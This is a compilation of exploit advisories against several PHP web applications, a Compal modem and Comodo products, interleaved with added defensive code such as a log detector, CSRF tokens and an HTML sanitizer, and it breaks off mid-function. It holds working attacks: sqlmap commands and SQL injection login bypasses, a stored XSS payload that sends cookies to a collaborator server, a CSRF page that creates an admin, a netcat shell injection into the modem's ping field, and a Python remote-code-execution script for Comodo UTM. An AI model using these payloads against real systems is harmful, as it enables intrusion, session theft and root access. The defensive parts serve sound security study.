# Exploit Title : Complain Management System Blind SQL Injection
# Date: 10 October 2017
# Exploit Author: havysec
# Tested on: ubuntu14.04
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files
## About The Product:
Complain Management is a web-based project used to manage customers' complaints online. Users can log in, create a complaint, view complaint details and track the status of their complaint.
## Vulnerability:
The functions.php file line 88 has hardcoded admin credentials.
```php
elseif($uType == 'admin'){
    //$_SESSION['user_id'] = $row['sid'];
    if($userName == 'admin' && $password == 'admin123'){
        $_SESSION['user_id'] = 0;
        $_SESSION['user_name'] = 'Administrator';
        $_SESSION['user_type'] = 'admin';
        header('Location: '.WEB_ROOT.'index.php');
        exit;
    }
}
```
Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection.
- HTTP Method: GET
- Sqlmap command: sqlmap -u 'http://192.168.1.104/view.php?mod=admin&view=repod&id=plans' --cookie="PHPSESSID=t1bc9vj67odrj3bd096g0rffe0"
- Sqlmap output:
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[00:47:53] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 22 to 40 columns'
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 42 to 60 columns'
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 62 to 80 columns'
[00:47:54] [INFO] testing 'MySQL UNION query (98) - 82 to 100 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 650 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: mod=admin&view=repod&id=plans WHERE 6586=6586 AND 9310=9310#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: mod=admin&view=repod&id=plans WHERE 3317=3317 AND (SELECT 4063 FROM(SELECT COUNT(*),CONCAT(0x7176767a71,(SELECT (ELT(4063=4063,1))),0x7170766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: mod=admin&view=repod&id=plans WHERE 4122=4122 AND (SELECT * FROM (SELECT(SLEEP(5)))zWVH)--
---
[00:47:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0
[00:47:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 444 times
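The sqlmap run above leaves two clear traces in the web server's access log: the injected `id` values (boolean, error-based and time-based payloads) and a burst of HTTP 500 responses from one client. The following detector, an added example that is not part of the advisory, scans Apache combined-format log lines for both signals; the log lines are constructed, and the IP addresses and threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Apache "combined"/"common" access-log prefix (the advisory's target runs Apache 2.4.7).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Signatures of the techniques sqlmap reported against the `id` parameter:
# boolean-based (AND 9310=9310#), error-based (FLOOR(RAND(0)*2) ... INFORMATION_SCHEMA)
# and time-based (SLEEP(5)); UNION is included because sqlmap probed for it too.
SQLI_PATTERNS = [
    ("boolean-based", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
    ("error-based", re.compile(r"FLOOR\(RAND\(0\)\*2\)|INFORMATION_SCHEMA", re.I)),
    ("time-based", re.compile(r"\bSLEEP\(\s*\d+\s*\)|\bBENCHMARK\(", re.I)),
    ("union-based", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
]


def classify_request(url):
    """Return the technique names whose signature appears in any query-string
    value of `url`. parse_qs decodes once; the extra unquote_plus pass also
    catches double-encoded payloads."""
    hits = []
    for values in parse_qs(urlsplit(url).query, keep_blank_values=True).values():
        for value in values:
            decoded = unquote_plus(value)
            for name, pattern in SQLI_PATTERNS:
                if name not in hits and pattern.search(decoded):
                    hits.append(name)
    return hits


def scan_log(lines, error_threshold=20):
    """Scan access-log lines and return, per client IP, the techniques seen and
    the IPs that produced more than `error_threshold` HTTP 500 responses. The
    second signal mirrors the advisory's run: 444 x 500 over 650 requests."""
    techniques = {}
    errors = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip = m.group("ip")
        for name in classify_request(m.group("url")):
            techniques.setdefault(ip, set()).add(name)
        if m.group("status") == "500":
            errors[ip] += 1
    return {
        "techniques": {ip: sorted(names) for ip, names in techniques.items()},
        "error_bursts": sorted(ip for ip, n in errors.items() if n > error_threshold),
    }


# Constructed sample log: one benign request, the boolean payload, an unrelated
# client, then a burst of time-based payloads that the server answered with 500.
_TIME_BASED = ('192.0.2.10 - - [10/Oct/2017:00:47:54 +0000] "GET /view.php?mod=admin&view=repod'
               '&id=plans%20WHERE%204122%3D4122%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))zWVH)--'
               ' HTTP/1.1" 500 0')
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2017:00:47:53 +0000] "GET /view.php?mod=admin&view=repod&id=plans HTTP/1.1" 200 1532',
    '192.0.2.10 - - [10/Oct/2017:00:47:53 +0000] "GET /view.php?mod=admin&view=repod'
    '&id=plans%20WHERE%206586%3D6586%20AND%209310%3D9310%23 HTTP/1.1" 200 1532',
    '198.51.100.7 - - [10/Oct/2017:00:48:01 +0000] "GET /view.php?mod=admin&view=repod&id=plans HTTP/1.1" 200 1532',
] + [_TIME_BASED] * 25

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```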
# Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS)
# Date: 27.04.2023
# Exploit Author: Lucas Noki (0xPrototype)
# Vendor Homepage: https://github.com/vogtmh
# Software Link: https://github.com/vogtmh/cmaps
# Version: 8.0
# Tested on: Mac, Windows, Linux
# CVE : CVE-2023-29983
*Steps to reproduce:*
1. Clone the repository and install the application
2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=
3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>
4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.
5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog
6. Check your collaborator server. You should have a request where the admin's cookie is the value of the c parameter.
In a real world case you would need to wait for the admin to log into the application and open the auditlog tab.
Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.
# Exploit Title: Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)
# Date: 17-10-2021
# Exploit Author: Aniket Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP
Steps to Reproduce:
1) Navigate to http://127.0.0.1/employment_application and log in with a staff account.
2) Navigate to the Vacancies tab.
3) Click on Add New.
4) Add the payload
"><img src=x onerror=alert(1)>
in the Vacancy Title field.
5) Click on Save and you are done. It's gonna be triggered when anyone visits the application.
Request:
POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------15502044322641666722659366422
Content-Length: 931
Origin: http://127.0.0.1
DNT: 1
Connection: close
Cookie: PHPSESSID=e00mbu2u5cojpsh5jkaj9pjlfc
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cache-Control: no-transform
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="id"
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="title"
"><img src=x onerror=alert(1)>
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="designation_id"
1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="slots"
1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="status"
1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="description"
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
-----------------------------15502044322641666722659366422--
# Title: Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated)
# Exploit Author: Yash Mahajan
# Date: 2021-10-09
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Version: 1
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Tested On: Windows 10, XAMPP
# Vulnerable Parameters: "id" , "username"
Steps to Reproduce:
A) SQL Injection (Authentication Bypass)
1) Navigate to http://localhost/employment_application/admin/login.php
2) Enter the payload into the username field as "' or 1=1-- " without double-quotes and type anything into the password field.
3) Click on "Login" button and you are logged in as administrator.
Request:
========
POST /employment_application/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Origin: http://localhost
Connection: close
Referer: http://localhost/employment_application/admin/login.php
Cookie: PHPSESSID=fk1gp1s7stu7kitjmhvjfakjqk
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
username='+or+1%3D1--+-&password=admin
--------------------------------------------------------------------------------
B)
1) Vulnerable Parameter: "id"
2) Sqlmap command to retrieve the tables from the database:
python sqlmap.py -u "http://localhost/employment_application/?page=view_vacancy&id=1" --level=3 --risk=2 --banner --dbms=sqlite --tables
# Exploit Title: Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)
# Date: 18-10-2021
# Exploit Author: Aniket Anil Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP
Detail:
The application is not using any security token to protect against CSRF. Therefore, a malicious user can add a new administrator user account by using a crafted POST request.
CSRF PoC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/employment_application/Actions.php?a=save_user"
method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="fullname" value="Test" />
<input type="hidden" name="username" value="Test" />
<input type="hidden" name="type" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
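The PoC above works because the save_user handler accepts any POST that carries a valid session cookie. The following added example, written in Python rather than the application's PHP and not taken from the project, shows the missing piece: a token bound to the session by an HMAC, rendered into the form as a hidden field and checked before the user is created. The key, session ids and handler name are assumptions; setting the session cookie with SameSite=Lax is a complementary defence not shown here.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side key; a real deployment loads it from configuration,
# never from source.
SERVER_KEY = b"constructed-example-key-change-me"


def _mac(session_id, nonce):
    msg = (session_id + ":" + nonce).encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id):
    """Token bound to the caller's session: random nonce plus an HMAC over
    (session id, nonce). The server renders it into the form as a hidden
    field; a cross-site page cannot read it, so it cannot forge it."""
    nonce = secrets.token_hex(16)
    return nonce + "." + _mac(session_id, nonce)


def verify_csrf_token(session_id, token):
    """True only if `token` was issued for this very session."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    return hmac.compare_digest(mac, _mac(session_id, nonce))


def handle_save_user(session_id, form):
    """Guard for the Actions.php?a=save_user handler (hypothetical Python
    port). The Burp-generated PoC posts id/fullname/username/type with no
    token, so it is rejected before any user is created."""
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "CSRF token missing or invalid"
    # ... the real handler would insert the user here ...
    return 200, "user %s (type %s) saved" % (form["username"], form["type"])


if __name__ == "__main__":
    session = "constructed-session-id"
    token = issue_csrf_token(session)
    poc_form = {"id": "", "fullname": "Test", "username": "Test", "type": "1"}
    print("PoC form without token:", handle_save_user(session, poc_form))
    print("same form with token:  ", handle_save_user(session, dict(poc_form, csrf_token=token)))
```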
# Exploit Title: Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS)
# Date: 18-10-2021
# Exploit Author: Aniket Anil Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP
Steps to reproduce:
1) Log in with a staff account and navigate to the Vacancies tab.
2) Click on Add New Vacancies. Put any random information in the other fields except description, and go to the description window.
3) In the description field, select Insert Link.
4) In the "Text to display" field, add the following payload.
"><img src=x onerror=alert(1)>
5) Click on Save and you are done. It's gonna be triggered when someone opens the vacancy details.
Request:-
POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------156186133432167175201476666002
Content-Length: 1012
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/employment_application/admin/?page=vacancies
Cookie: PHPSESSID=ah0lpri38n5c4ke3idhbkaabfa
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="id"
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="title"
Test1ee
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="designation_id"
4
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="slots"
1
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="status"
1
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="description"
<p><br><a href="http://google.com" target="_blank">"><img src="x"
onerror="alert(1)"></a></p>
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
-----------------------------156186133432167175201476666002--
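The three stored XSS reports above (the Companymaps audit-log token, the vacancy title, and the vacancy description) share one root cause: user input is written back into HTML unchanged. The following added example, in Python rather than the applications' PHP and not taken from either project, shows the two output treatments a fix needs: plain-text fields are HTML-escaped, while the rich-text description (which legitimately carries the editor's link markup) is rebuilt through a tag and attribute allowlist that drops `img`, every `on*` handler and non-http(s) `href` values. The allowlist contents are assumptions.

```python
import html
from html.parser import HTMLParser


def render_text(value):
    """Plain-text fields (vacancy title, audit-log token): escape on output so
    any markup in the value is shown literally instead of being parsed."""
    return html.escape(value, quote=True)


# Allowlist for the rich-text description field (assumed; adjust to the editor).
ALLOWED_TAGS = {"p", "br", "a", "b", "i", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href", "target"}}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}


class AllowlistSanitizer(HTMLParser):
    """Re-serialises a fragment keeping only allowlisted tags/attributes; the
    text content of dropped tags is kept (escaped), the tags themselves are not."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # <img>, <script>, ... vanish; on* handlers go with them
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            if name == "href" and not value.lower().startswith(SAFE_URL_SCHEMES):
                continue  # blocks javascript: and data: URLs
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open_tags:
            while self.open_tags:  # close anything left open inside it
                t = self.open_tags.pop()
                self.out.append("</%s>" % t)
                if t == tag:
                    break

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))

    def result(self):
        while self.open_tags:  # balance tags the input left open
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_html(fragment):
    p = AllowlistSanitizer()
    p.feed(fragment)
    p.close()
    return p.result()


if __name__ == "__main__":
    # The two payloads from the advisories above.
    print(render_text('"><img src=x onerror=alert(1)>'))
    print(sanitize_html('<p><br><a href="http://google.com" target="_blank">'
                        '"><img src="x" onerror="alert(1)"></a></p>'))
```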
# Exploit Title: Company Visitor Management System (CVMS) 1.0 - Authentication Bypass
# Date: 16/10/2020
# Exploit Author: Oğuz Türkgenç
# Vendor Homepage: https://phpgurukul.com/company-visitor-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=9602
# Version: 1.0
# Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3
Step 1: Open the URL http://localhost/cvms/index.php
Step 2: Use the payload ot' or 1=1# in the username and password fields.
Malicious Request
POST /cvms/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.175.128/cvms/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://localhost
Connection: close
Cookie: lang=english; PHPSESSID=qkg4nmdq97r4jkvkm4raa34660
Upgrade-Insecure-Requests: 1
username=ot%27+or+1%3D1+%23&password=ot%27+or+1%3D1+%23&login=
Step 3: You will be logged in as admin.
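Both authentication bypasses on this page (the Recruitment Management System's `' or 1=1-- ` against SQLite, and the CVMS `ot' or 1=1#` against MySQL, which differs only in the comment syntax) come from building the login query by string concatenation. The following added example, not taken from either application, reproduces the flaw against an in-memory SQLite table with the SQLite payload, then shows the parameterised form that defeats it; the table schema and credentials are constructed.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's user table (the
    real schema is not on the page); one administrator row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
               "password TEXT, type INTEGER)")
    db.execute("INSERT INTO users (username, password, type) "
               "VALUES ('admin', 'correct horse', 1)")
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """Builds the statement by string concatenation, so the submitted username
    becomes SQL. With the advisory's payload the statement turns into
        ... WHERE username = '' or 1=1-- ' AND password = '...'
    and the -- comment swallows the password check."""
    sql = ("SELECT id, username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()


def login_fixed(db, username, password):
    """Parameterised statement: the driver passes the values separately from
    the SQL text, so the payload is compared as a literal username and matches
    nothing. (Hashed password verification belongs here too; it is outside
    this example.)"""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1-- "   # the advisory's username payload
    print("vulnerable:", login_vulnerable(db, payload, "anything"))
    print("fixed:     ", login_fixed(db, payload, "anything"))
```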
Compal CH7465LG-LC modem/router multiple vulnerabilities
--------------------------------------------------------
The following vulnerabilities are the result of a quick check (~3 hours) of the Mercury modem. We also performed a systematic and deeper evaluation of this device, the results of which are described in a separate report [2] and advisory.
Platforms / Firmware confirmed affected:
- Compal CH7465LG-LC, CH7465LG-NCIP-4.50.18.13-NOSH
Vulnerabilities
---------------
Insecure session management
The web interface uses cookies, but they are not verified. Thus, once an admin login is successful, the IP address and the browser type of the admin user are stored, and anyone with the same IP and the same user-agent can access the management interface.
Information leakage
Some information requests can be performed without authentication. For
example an attacker can obtain the following information pieces:
- Global settings (SW version, vendor name, etc.)
- CSRF token
- Event log
- LAN user table
- Ping response
Unauthenticated denial of service attack
Factory reset can be initiated without authentication with a simple POST
request to the getter.xml.
Unauthenticated configuration changes
Some settings modifications can be performed without authentication, for example the first-install flag and the ping command.
Unauthenticated command injection
The ping diagnostic function is vulnerable to system command injection,
because parameters are checked only at the client side. Using the
following ping target, the attacker can gain local root access to the
device:
"token=<csrf_token>&fun=126&Type=0&Target_IP=127.0.0.1&Ping_Size=64;nc -l -p 1337 -e /bin/sh;&Num_Ping=3&Ping_Interval=1"
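The root cause named above is that the ping parameters are checked only on the client. The following added example (not the device's firmware code, which the advisory does not show) is the server-side treatment in Python for the same form fields: each value is converted to a typed object before use and the command is started from an argument vector with no shell, so a `;` in Ping_Size is rejected rather than executed. The ping flag names assume an iputils/BusyBox-style ping; the endpoint would additionally have to require an authenticated admin session, which is not shown.

```python
import ipaddress
import subprocess


def validate_ping_params(params):
    """Server-side validation of the ping form fields the advisory names.
    Every value is converted to a typed object; anything that is not a bare
    IP address or a small integer raises ValueError, so a shell metacharacter
    in Ping_Size never reaches a command line."""
    target = ipaddress.ip_address(params.get("Target_IP", "").strip())
    size = int(params.get("Ping_Size", "64"))
    count = int(params.get("Num_Ping", "3"))
    interval = int(params.get("Ping_Interval", "1"))
    if not 0 <= size <= 65500:
        raise ValueError("Ping_Size out of range")
    if not 1 <= count <= 10:
        raise ValueError("Num_Ping out of range")
    if not 1 <= interval <= 10:
        raise ValueError("Ping_Interval out of range")
    return {"target": target, "size": size, "count": count, "interval": interval}


def build_ping_argv(params):
    """Argument vector for iputils/BusyBox-style ping (assumed flags). Passing a
    list to subprocess with no shell means the values are arguments and are
    never parsed as a command line."""
    v = validate_ping_params(params)
    return ["ping", "-c", str(v["count"]), "-i", str(v["interval"]),
            "-s", str(v["size"]), str(v["target"])]


def run_ping(params, timeout=30):
    """Run the validated ping and return its standard output."""
    argv = build_ping_argv(params)
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout).stdout


if __name__ == "__main__":
    # Constructed form submissions: the benign one from the advisory's request,
    # and the same fields with a shell metacharacter in Ping_Size.
    good = {"Target_IP": "127.0.0.1", "Ping_Size": "64", "Num_Ping": "3", "Ping_Interval": "1"}
    print(build_ping_argv(good))
    try:
        build_ping_argv(dict(good, Ping_Size="64;"))
    except ValueError as exc:
        print("rejected:", exc)
```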
Timeline
--------
- 2015.10.21: SEARCH-LAB received two sample boxes from the Compal Mercury devices from UPC Magyarorszag
- 2015.10.21: Within three hours we reported a remotely exploitable vulnerability on the device
- 2015.10.21: Liberty Global asked for a commercial proposal on executing an overall security evaluation of the Compal device.
- 2015.10.24: A proposal was sent to Liberty Global.
- 2015.11.09: Liberty Global asked to execute the evaluation as a pilot project without financial compensation.
- 2015.12.07: End Use Certificate for Dual-Use Items was asked from Liberty Global as the developer of the device is located in China.
- 2016.01.07: The 99-page-long Evaluation Report on Compal Mercury modem was sent to Liberty Global with the restriction that they are not allowed to forward it outside of the European Union until a signed End Use Certificate is received.
- 2016.01.07: First reaction to the report said: “Bloody hell, that is not a small document ;)”
- 2016.01.11: Liberty Global sent the signed End Use Certificate for Dual-Use Items to SEARCH-LAB
- 2016.01.27: UPC Magyarorszag sent out a repeated warning to its end users about the importance of changing the default passphrases.
- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters
- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases.
Recommendations
---------------
We do not know of any workaround. The ISP should install a firmware update once the fix is ready.
Credits
-------
This vulnerability was discovered and researched by Gergely Eberhardt from SEARCH-LAB Ltd. (www.search-lab.hu)
References
----------
[1] http://www.search-lab.hu/advisories/secadv-20160720
[2] http://www.search-lab.hu/media/Compal_CH7465LG_Evaluation_Report_1.1.pdf
# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE details: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8
import requests


def RndInt(Lenght):
    # Return a string of `Lenght` random decimal digits; used to fill the
    # numeric query parameters the web shell endpoint expects.
    from random import choice
    from string import digits
    RandonInt = ''.join([choice(digits) for n in range(Lenght)])
    return str(RandonInt)


if __name__ == "__main__":
    IP = input("IP: ")
    Port = input("Port: ")
    # URL-encoded "service\nssh\ndisable\n": disables SSH on the appliance.
    Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a'
    # For more info about the command syntax, read the manual of the specific
    # version of Comodo UTM and the exploit PoC
    # (https://github.com/Fadavvi/CVE-2018-17431-PoC).
    BaseURL = ("https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1)
               + "&w=" + RndInt(3) + "&h=" + RndInt(2))
    BaseNComdURL = BaseURL + "&k=" + Command
    LastPart = "&l=" + RndInt(2) + "&_=" + RndInt(13)
    FullURL = BaseNComdURL + LastPart
    # Second request sends only an extra Enter keystroke (%0a).
    AddetionalEnter = BaseURL + "&k=%0a" + LastPart
    try:
        FirstResponse = requests.get(FullURL).text
    except requests.RequestException:
        print('\nExploit failed due to HTTP error. Check given URL and Port!\n')
        exit(1)
    SecondResponse = requests.get(AddetionalEnter).text
    if SecondResponse.find("Configuration has been altered") == -1:
        print("\nExploit Failed!\n")
        exit(1)
    else:
        print("\nOK! Command Ran!\n")
        exit(0)
Comodo GeekBuddy Local Privilege Escalation (CVE-2014-7872)
Jeremy Brown [jbrown3264/gmail]
-Synopsis-
Comodo GeekBuddy, which is bundled with Comodo Anti-Virus, Comodo Firewall
and Comodo Internet Security, runs a passwordless, background VNC server
and listens for incoming connections. This can allow for at least local
privilege escalation on several platforms. It also may be remotely
exploitable via CSRF-like attacks utilizing a modified web-based VNC client
(eg. a Java VNC client).
-Repro-
1) Install GeekBuddy (either standalone or bundled with the aforementioned
packages)
2) Administrator (or other user) logs into the system so the VNC server
will be started
3) Start another login to the system (eg. target OS is Windows Server)
4) Connect to the VNC server on localhost to assume the Admin session
-Fix-
Comodo says they have fixed this vulnerability with the v4.18.121 release in October 2014.
-References-
https://technet.microsoft.com/en-US/dn613815
http://archive.hack.lu/2014/Microsoft%20Vulnerability%20Research%20-%20How%20to%20be%20a%20Finder%20as%20a%20Vendor.pdf
# Exploit Title: Comodo Dragon Browser Unquoted Service Path Privilege Escalation
# Date: 24/09/2016
# Author: Yunus YILDIRIM (@Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH)
# Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Category: local
# Vendor Homepage: https://www.comodo.com
# Software Link: https://www.comodo.com/home/browsers-toolbars/browser.php
# Version: Software Version <= 52.15.25.663
# Tested on: Windows 7 x86/x64
1. Description
Comodo Dragon Browser Update Service (DragonUpdater) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof of Concept
C:\>sc qc DragonUpdater
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DragonUpdater
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : COMODO Dragon Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt requires the local attacker to place an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will run with elevated privileges.
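The `sc qc` output above contains everything an audit needs: the unquoted BINARY_PATH_NAME with spaces and SERVICE_START_NAME set to LocalSystem. The following added example (not from the advisory or from Comodo) parses that output and derives the file names Windows resolves before the intended binary, which are the locations whose write permissions an administrator has to review; the advisory's output is embedded as the sample input.

```python
import re


def parse_sc_qc(output):
    """Parse the text `sc qc <service>` prints into a {FIELD: value} dict."""
    fields = {}
    for line in output.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def unquoted_path_candidates(binary_path):
    """For an unquoted service path containing spaces, return the file names
    CreateProcess tries before the intended binary (each space-delimited prefix
    with ".exe" appended). A quoted or space-free path yields []."""
    path = binary_path.strip()
    if path.startswith('"'):
        return []
    m = re.match(r"(.*?\.exe)(\s.*)?$", path, re.I)   # drop any arguments
    exe_path = m.group(1) if m else path
    parts = exe_path.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def audit_service(sc_output):
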